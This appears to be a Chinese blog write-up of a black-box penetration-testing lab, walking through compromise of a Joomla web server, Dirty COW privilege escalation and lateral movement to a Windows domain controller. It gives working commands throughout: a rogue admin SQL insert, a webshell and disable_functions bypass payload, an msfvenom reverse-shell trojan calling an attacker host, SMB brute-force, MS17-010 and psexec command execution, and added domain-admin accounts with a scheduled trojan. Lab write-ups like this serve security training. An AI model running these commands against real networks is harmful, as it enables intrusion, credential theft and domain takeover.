因为这次为黑盒测试,给了5个虚拟机,centos为出网机器,具体的ip配置如下:
web-centos:192.168.93.100 外网:192.168.167.135
web-ubantu:192.168.93.120
win7:192.168.93.30
win2008:192.168.93.20
win2012:192.168.93.10
给ip是为了提前把网络调通,免得浪费不必要的时间,保证网络通畅后将其余ip视为不知,仅从web-centos开始;
就一个是双网卡,其余都是单网卡内网机器
centos网卡eth0设置为自动获取ip;
vim /etc/sysconfig/network-scripts/ifcfg-eth0)
然后重启网络服务/etc/init.d/network restart, 搞定。
一、拿下web-centos服务器
有22端口,简单的ssh尝试一下:
ssh root@192.168.167.135
手工尝试了几波不对,换条路在试试;
尝试打开80端口的网页,但一直在报502错误,以为是nginx有问题,折腾了半天,突然反应过来nginx是反向代理,实际的服务器是web-ubantu,我这个心情,(反向代理,越来越有意思了。。)
知道是joomla搭建的网站,网站目录探测一波,发现了:
后台地址:http://192.168.167.135/administrator/
配置文件泄露:http://192.168.167.135/configuration.php~
知道了数据库密码,3306也开着,尝试登录一波;
成功登录数据库,但管理员密码不知道,joomla官网有重置管理员密码的操作,
Joomla使用SQL代码,admin2 secret
INSERT INTO `umnbt_users`
(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `umnbt_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');
通过查询来执行sql语句;
这里还有一个数据库的user表,上面这个添加错了,结果怎么也进不去,处处有坑啊;
终于登入后台了;通过修改模板来写入shell;
文件是在web-ubuntu的机器里;
上蚁剑连上;
虚拟终端执行命令,返回的是127;
查看php的配置情况;这个操作学习了;
服务端 disable_functions 禁用了命令执行函数,
目标是linux,并且没有禁用putenv函数,所以可以利用LD_PRELOAD绕过;
用蚁剑把 bypass_diablefunc.php 和 bypass_diablefunc_x64.so 上传到目标的同一目录,注意 .so 文件需要根据目标系统架构选择,然后访问 bypass_diablefunc.php,cmd 是执行的命令,outpath是读写权限的目录,sopath是 .so 文件的绝对路径。
工具下载地址: https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
payload 如下:
http://192.168.167.135/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/baji&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
查看ip信息,发现ip并不是centos的,看了下应该是ubuntu的,说明真正的web服务后端是在ubuntu上,通过centos做了个nginx反向代理解析到Ubuntu上了。
分析:当前ubuntu的权限太低…并且内核很高,不好提权,想执行socks代理的程序,都成问题,并且ubuntu是不出网的,那么我有没有办法拿到centos的权限呢?既然做了反代,那么我能否看一下bash历史记录,找到一些遗漏的信息呢?(结果不行…),然后就各种配置文件找、有权限看的文件都看一下,想找到有泄露的信息;
尝试登录一波;
由于权限太小,考虑是否能提权;
内核版本需要在2.6.22以上,并且未打补丁,符合脏牛的使用条件;
提权成功了;
第一行中的-02要删除;
有权限了,首先当然是msf木马上去控了,方便后续操作;
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.167.131 LPORT=4444 -f elf > shell.elf
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.167.131
set lport 4444
exploit
将木马拷贝过去运行后;
第一台web-centos拿下了,下面开始进行内网横向移动;
二、内网横向移动
run get_local_subnets #查看路由段
run autoroute -s 192.168.93.0/24 #添加路由至本地
run autoroute -p #打印当前路由信息
background
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.0/24
exploit
因为后面几台都为windows,上CS更方便,这里用msf派生给CS会话;
打开msf,使用payload_inject模块注入到cobalt strike,注意使用的payload要和cs的一致为reverse_http,因为cs监听的是reverse_http;
meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject
# 设置与cs相同的payload,别加x64,尽管被入侵系统是x64的;
msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
msf5 exploit(windows/local/payload_inject) > set lhost 192.168.167.128
msf5 exploit(windows/local/payload_inject) > set lport 7777
# 设置刚才获得session
msf5 exploit(windows/local/payload_inject) > set session 1
msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true
msf5 exploit(windows/local/payload_inject) > run
不知为何报错没有成功,那就算了,
尝试爆破 windows 2008 的本地管理员
use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.20
set SMBUser administrator
set PASS_FILE /usr/share/wordlists/top1000.txt
run
使用psexec登陆win2008,没有打成功;
use exploit/windows/smb/psexec
set rhosts 192.168.93.20
set smbpass 123qwe!ASD
set smbuser Administrator
run
用use exploit/windows/smb/psexec_psh同样没有成功;
用exploit/windows/smb/ms17_010_psexec 尝试去打一个shell回来,没成功;
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.93.20
set payload windows/meterpreter/bind_tcp
set lhost 192.168.167.131
set lport 6666
set SMBPass 123qwe!ASD
set SMBUser Administrator
run
用 use auxiliary/admin/smb/ms17_010_command 执行一些系统权限的命令,添加管理员用户尝试3389登录,失败;
use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.93.20
set command net user test hongrisec@2019 /add #添加用户
run #成功执行
set command net localgroup administrators test /add #管理员权限
run #成功执行
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
run #成功执行
可以执行命令,但在kali里远程桌面无法连接;
use auxiliary/admin/smb/psexec_command
set rhosts 192.168.93.20
set smbpass 123qwe!ASD
set smbuser Administrator
set command net user test hongrisec@2019 /add
run
set command net localgroup administrators test /add
run
set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
run
添加域管账户
Net user demo demo /ad /domain
Net group “domain admins” demo /ad /domain
rdesktop -u test -p hongrisec@2019 192.168.93.20:3389
rdesktop -u Administrator -p 123qwe!ASD 192.168.93.20:3389
添加的用户是成功的,但没法远程连接,只能用Administrator账户远程登录;可能windowserver2008默认选择了”允许重新连接,但拒绝新用户登录“的功能了
一种方法是用反向代理的方法,在web-centos安装客户端,攻击机安装服务端,做好socks5反向代理,然后用代理在挂上远程桌面登录;
还有种方法是上个连接的神器:mobaxterm,通过web-centos的ssh来中转,因为该机器有双网卡;
成功连接了,有点猛是真的;
上mimikatz抓下密码:
net use \192.168.93.10\c$ “zxcASDqw123!!” /user:“Administrator”
dir \192.168.93.10\c$
重新生成一个木马,上传,
copy c:\phpstudy\www\yxcms\shell.exe \192.168.93.10\c$
设置一个任务计划,定时启动木马之后就能够获取域控的shell了
schtasks /create /tn “test” /tr C:\shell222.exe /sc once /st 22:51 /S 192.168.93.10 /RU System /u Administrator /p “zxcASDqw123!!”
type \192.168.93.10\c$\Users\Administrator\Documents\flag.txt
345
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
